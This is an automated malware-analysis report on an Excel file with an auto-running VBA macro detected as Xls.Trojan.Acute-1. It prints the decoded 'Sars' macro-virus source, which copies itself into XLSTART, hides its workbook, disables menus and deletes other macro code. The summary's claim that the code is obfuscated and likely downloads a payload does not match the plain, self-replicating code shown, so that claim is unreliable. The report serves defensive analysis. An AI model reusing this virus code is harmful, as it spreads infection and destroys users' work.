Office (OLE) malware analysis — malicious · 3e3885fcde8fe91e

MALICIOUS

Office (OLE)

37.5 KB Created: 2005-10-20 22:16:36 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: a3cea997fa3d2e5023fcd077c7e392cd SHA-1: 379afcb7caf455b2cfd7afd209d9e5fe09388a58 SHA-256: 3e3885fcde8fe91effac102392ec05d526797f987c2b6a0f761d0db1345e42ba

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel document containing a VBA macro that is automatically executed upon opening (Auto_Open). The macro is detected as malicious by ClamAV with the signature Xls.Trojan.Acute-1. The VBA code itself is obfuscated and truncated, but the presence of the Auto_Open macro and the ClamAV detection strongly indicate a malicious intent, likely to download and execute a secondary payload.

Heuristics 3

ClamAV: Xls.Trojan.Acute-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Trojan.Acute-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4825 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4825 bytes
SHA-256: `97dd7668fd033cf6c4cde38e4679832b9734f738875052b7c95e53b91c8a87ae`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sars" ' Sars virus! ' Bandung, Indonesian ' Tonk sok Sars nyieunan macro, lah... ' Public Const Micro = "Sars" Public Const Data0 = Micro & ".xls" Public Const Data1 = "The Visual Basic environment could not be intialize. Please run setup to install it correctly." Sub CkAgain() Attribute CkAgain.VB_ProcData.VB_Invoke_Func = " \n14" Dim bg As Object Dim po As Object On Error Resume Next End Sub Sub Auto_Open() Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14" Dim Ct As Object Dim bg As Object Dim bgc As Object Dim bck As Object Dim xlsz As Object Dim Ck As Boolean On Error Resume Next KillStart With Application If WeekDay(Now) Mod 2 = A Then .Caption = "~~Fakir Meng_" Else .Caption = "~~Fakir Meng_" End If If Dir(.Path & "\Xlstart") = "" Then MkDir .Path & "\Xlstart" If Day(Date) = 20 Then MsgBox "UPDATE ME NOW, INFECTED BY BUGGIE!", 48, Micro Date = Now + 1 End If .ScreenUpdating = False .EnableCancelKey = xlDisabled If Day(Date) Mod 2 = 0 Then .OnTime Now + TimeValue("1"), "SarsWordArt" End If If Dir(.StartupPath & "\" & Data0) = "" Then ActiveWorkbook.SaveAs .StartupPath & "\" & Data0 End If If Workbooks.Count = 1 And .Workbooks(1).Name = Data0 Then Workbooks.Add: ActiveWorkbook.Windows(1).Caption = "Book1" End If Set bg = ActiveWorkbook .OnKey "%{F12}", "Sars.Cr" .OnKey "%{F8}", "Sars.Cr" .OnKey "%{F11}", "Sars.Cr" .CommandBars("Window").Controls("Unhide...").Enabled = False .CommandBars("Tools").Controls("Macro").Delete .OnSheetActivate = "Sars.xls!auto_Open" Workbooks(Data0).Windows.Item(1).Visible = False CkAgain If Dir(.Path & "\Wintlb32.dll") = "" Then Workbooks(Data0).VBProject.VBComponents(Micro).Export .Path & "\Wintlb32.dll" End If For Each boom In bg.VBProject.VBComponents If boom.Type <> 100 Then If boom.Name <> Micro Then bg.VBProject.VBComponents.Remove boom End If Else Set bck = boom.codemodule If bck.CountOflines <> 0 Then bck.Deletelines 1, bck.CountOflines End If Next boom For Each xlsz In bg.VBProject.VBComponents If xlsz.Name = Micro Then Ck = True: Exit For Next xlsz If Ck = False Then Set Ct = bg.VBProject.VBComponents Ct.Import .Path & "\Wintlb32.dll" Kill .Path & "\Wintlb32.dll" Workbooks(Data0).Save If InStr(1, bg.FullName, "\") Then ActiveWorkbook.Save End If End With End Sub Sub Cr(): MsgBox Data1, 16, "Microsoft Visual Ba ... (truncated)

SHA-256: 97dd7668fd033cf6c4cde38e4679832b9734f738875052b7c95e53b91c8a87ae

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sars"
'   Sars virus!
'   Bandung, Indonesian
'   Tonk sok Sars nyieunan macro, lah...
'
Public Const Micro = "Sars"
Public Const Data0 = Micro & ".xls"
Public Const Data1 = "The Visual Basic environment could not be intialize. Please run setup to install it correctly."
Sub CkAgain()
Attribute CkAgain.VB_ProcData.VB_Invoke_Func = " \n14"
Dim bg          As Object
Dim po          As Object

On Error Resume Next


End Sub
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
    Dim Ct                  As Object
    Dim bg                  As Object
    Dim bgc                 As Object
    Dim bck                 As Object
    Dim xlsz                As Object
    Dim Ck                  As Boolean
    
On Error Resume Next
KillStart
With Application
     If WeekDay(Now) Mod 2 = A Then
        .Caption = "~~Fakir Meng_"
     Else
        .Caption = "~~Fakir Meng_"
     End If
     If Dir(.Path & "\Xlstart") = "" Then MkDir .Path & "\Xlstart"
     If Day(Date) = 20 Then
        MsgBox "UPDATE ME NOW, INFECTED BY BUGGIE!", 48, Micro
        Date = Now + 1
     End If
     .ScreenUpdating = False
     .EnableCancelKey = xlDisabled
     If Day(Date) Mod 2 = 0 Then
        .OnTime Now + TimeValue("1"), "SarsWordArt"
     End If
     If Dir(.StartupPath & "\" & Data0) = "" Then
        ActiveWorkbook.SaveAs .StartupPath & "\" & Data0
     End If
     If Workbooks.Count = 1 And .Workbooks(1).Name = Data0 Then
        Workbooks.Add: ActiveWorkbook.Windows(1).Caption = "Book1"
     End If
        Set bg = ActiveWorkbook
        .OnKey "%{F12}", "Sars.Cr"
        .OnKey "%{F8}", "Sars.Cr"
        .OnKey "%{F11}", "Sars.Cr"
        .CommandBars("Window").Controls("Unhide...").Enabled = False
        .CommandBars("Tools").Controls("Macro").Delete
     .OnSheetActivate = "Sars.xls!auto_Open"
     Workbooks(Data0).Windows.Item(1).Visible = False
     
     CkAgain
     If Dir(.Path & "\Wintlb32.dll") = "" Then
               Workbooks(Data0).VBProject.VBComponents(Micro).Export .Path & "\Wintlb32.dll"
     End If
     
        For Each boom In bg.VBProject.VBComponents
             If boom.Type <> 100 Then
                If boom.Name <> Micro Then
                   bg.VBProject.VBComponents.Remove boom
                End If
             Else
                Set bck = boom.codemodule
                If bck.CountOflines <> 0 Then bck.Deletelines 1, bck.CountOflines
             End If
         Next boom
     
     For Each xlsz In bg.VBProject.VBComponents
         If xlsz.Name = Micro Then Ck = True: Exit For
     Next xlsz
     
     If Ck = False Then
        Set Ct = bg.VBProject.VBComponents
               Ct.Import .Path & "\Wintlb32.dll"
               Kill .Path & "\Wintlb32.dll"
               Workbooks(Data0).Save
               If InStr(1, bg.FullName, "\") Then ActiveWorkbook.Save
     End If
     
End With
End Sub
Sub Cr(): MsgBox Data1, 16, "Microsoft Visual Ba
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.